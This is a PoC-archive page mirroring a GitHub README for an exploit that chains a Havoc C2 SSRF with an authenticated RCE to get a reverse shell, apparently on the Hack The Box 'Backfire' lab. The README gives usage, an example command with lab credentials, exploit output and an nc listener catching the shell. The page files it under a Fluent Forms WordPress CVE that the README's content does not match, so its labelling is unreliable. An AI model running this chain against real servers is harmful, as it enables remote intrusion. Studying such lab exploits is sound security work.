Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-4157 PoC — Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder <= 5.1.15 - PHP Object Injection v

Source
https://github.com/Ch4os1/CVE-2024-4157-SSRF-RCE-Reverse-Shell
Associated Vulnerability
Title:Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder <= 5.1.15 - PHP Object Injection via extractDynamicValues (CVE-2024-4157)
Description:The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 5.1.15 via deserialization of untrusted input in the extractDynamicValues function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. Successful exploitation requires the attacker to have "View Form" and "Manage Form" permissions, which must be explicitly set by an administrator. However, this requirement can be bypassed when this vulnerability is chained with CVE-2024-2771.
Description
Chaining Havoc C2 SSRF with RCE to get reverse shell on Havoc C2 Server.
Readme
# CVE-2024-4157: Getting Reverse Shell on Havoc C2  - Chaining SSRF with RCE
Get reverse-shell with local IP and Port, chaining [CVE-2024-4157 POC](https://github.com/chebuya/Havoc-C2-SSRF-poc) with [havoc_auth_rce](https://github.com/IncludeSecurity/c2-vulnerabilities/tree/main/havoc_auth_rce)

## Usage
- Basic info
```bash
$ python3 exploit.py
usage: exploit.py [-h] [-t TARGET] [-i IP] [-p PORT] [-A USER_AGENT] [-H HOSTNAME] [-u USERNAME] [-d DOMAIN_NAME] [-n PROCESS_NAME] [-ip INTERNAL_IP] [-U ADMIN_USERNAME] [-P
                  PASSWORD] [-l LOCAL_IP] [-lp LOCAL_PORT]
## -t: target IP where the C2 server is running on
## -i: internal IP address that we want the C2 server to interactive with (SSRF)
## -p: internal port 
## -U: username to the C2 server
## -P: password to the C2 server
## -l: local address for the reverse shell (RCE)
## -lp: local port for the reverse shell
```
- Example
```bash
$ python3 exploit.py -t https://10.129.150.254 -i 127.0.0.1 -p 40056 -U ilya -P 'CobaltStr1keSuckz!' -l 10.10.14.54 -lp 4444
[***] Trying to register agent...
[***] Success!
[***] Trying to open socket on the teamserver...
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to poll teamserver for socket output...
[***] Read socket output successfully!
```
- Reverse shell on our `nc` listener
```bash
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.54] from (UNKNOWN) [10.129.150.254] 53352
bash: cannot set terminal process group (2933): Inappropriate ioctl for device
bash: no job control in this shell
ilya@backfire:~/Havoc/payloads/Demon$ 
```

## Credit

- Credit to [@chebuya](https://github.com/chebuya/Havoc-C2-SSRF-poc) with the SSRF, [detailed blog on the vulnerability](https://blog.chebuya.com/posts/server-side-request-forgery-on-havoc-c2/)
- Credit to [@Laurence Tennant](https://github.com/IncludeSecurity/c2-vulnerabilities/tree/main/havoc_auth_rce) with the RCE, [detailed info on blog](https://blog.includesecurity.com/2024/09/vulnerabilities-in-open-source-c2-frameworks/)
- Credit to [0xdf](https://0xdf.gitlab.io/2025/06/07/htb-backfire.html) with the amazing writeup on [HTB Backfire](https://app.hackthebox.com/machines/Backfire)

## Disclaimer
- This tool is for educational and research purposes only
File Snapshot

 [4.0K]  /data/pocs/614383d697a48546e13163651a9be9819dd01e75
├── [ 12K]  exploit.py
└── [2.4K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →